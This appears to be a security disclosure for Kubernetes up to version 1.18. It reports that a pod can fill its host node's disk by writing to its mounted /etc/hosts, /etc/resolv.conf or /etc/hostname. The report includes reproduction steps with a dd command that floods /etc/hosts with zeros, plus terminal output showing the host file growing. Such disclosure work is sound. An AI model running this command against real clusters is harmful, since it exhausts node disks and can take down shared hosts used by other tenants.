Kubernetes: Node disk DOS by writing to container /etc/hosts

Report Submission Form

Summary:

Pod files /etc/hosts, /etc/hostname, /etc/resolve.conf are not readonly.
A normal pod running in kubernetes cluster can kil a host through write data to /etc/hosts.
Not only /etc/hosts, but also /etc/resolve.conf and /etc/hostname can do this.

Kubernetes Version:

<=1.18

Component Version:

Docker 19.03

Steps To Reproduce:

1. use kubectl create a pod like kubectl run
2. run kubectl exec -it $POD_NAME -- dd if=/dev/zero of=/etc/hosts count=1000000 bs=10M
3. run df -h /var/lib/kubelet on host that pod running, you can see the disk avaliable space are decreasing until the disk full.

Supporting Material/References:

[root@kebe-sm-315 ~]# kubectl exec -it rate-c848c5c8b-5b8vm sh
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl kubectl exec [POD] -- [COMMAND] instead.
Defaulting container name to rate.
Use 'kubectl describe pod/rate-c848c5c8b-5b8vm -n default' to see all of the containers in this pod.
/ # df -h
Filesystem                Size      Used Available Use% Mounted on
/dev/mapper/docker-8:16-67108930-710dfe5c781bd17e11968371b9d0f84641a2efde95c68a47eddf9ae518e768d1
                         10.0G     40.3M     10.0G   0% /
tmpfs                    64.0M         0     64.0M   0% /dev
tmpfs                     9.7G         0      9.7G   0% /sys/fs/cgroup
/dev/mapper/centos-root
                         53.0G     28.6G     24.4G  54% /dev/termination-log
/dev/sdb                100.0G     40.9G     59.1G  41% /etc/resolv.conf
/dev/sdb                100.0G     40.9G     59.1G  41% /etc/hostname
/dev/mapper/centos-root
                         53.0G     28.6G     24.4G  54% /etc/hosts
shm                      64.0M      8.0K     64.0M   0% /dev/shm
tmpfs                     9.7G     12.0K      9.7G   0% /var/run/secrets/kubernetes.io/serviceaccount
tmpfs                     9.7G         0      9.7G   0% /proc/acpi
tmpfs                    64.0M         0     64.0M   0% /proc/kcore
tmpfs                    64.0M         0     64.0M   0% /proc/keys
tmpfs                    64.0M         0     64.0M   0% /proc/timer_list
tmpfs                    64.0M         0     64.0M   0% /proc/timer_stats
tmpfs                    64.0M         0     64.0M   0% /proc/sched_debug
tmpfs                     9.7G         0      9.7G   0% /proc/scsi
tmpfs                     9.7G         0      9.7G   0% /sys/firmware

[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# ls -al
总用量 12
drwxr-xr-x  5 root root   71 5月   7 12:29 .
drwxr-x--- 50 root root 4096 5月   7 12:29 ..
drwxr-x---  5 root root   55 5月   7 12:31 containers
-rw-r--r--  1 root root  270 5月   7 12:31 etc-hosts
drwxr-x---  3 root root   37 5月   7 12:29 plugins
drwxr-xr-x  4 root root   65 5月   7 12:29 volumes
[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# kubectl exec -it rate-c848c5c8b-5b8vm -- dd if=/dev/zero of=/etc/hosts count=100 bs=1M
Defaulting container name to rate.
Use 'kubectl describe pod/rate-c848c5c8b-5b8vm -n default' to see all of the containers in this pod.
100+0 records in
100+0 records out
[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# ls -al
总用量 102408
drwxr-xr-x  5 root root        71 5月   7 12:29 .
drwxr-x--- 50 root root      4096 5月   7 12:29 ..
drwxr-x---  5 root root        55 5月   7 12:31 containers
-rw-r--r--  1 root root 104857600 5月   7 15:06 etc-hosts
drwxr-x---  3 root root        37 5月   7 12:29 plugins
drwxr-xr-x  4 root root        65 5月   7 12:29 volumes

• [attachment / reference]

Impact

If someone create a pod on a public cloud with kubernetes, the host of the provider may panic due to disk full.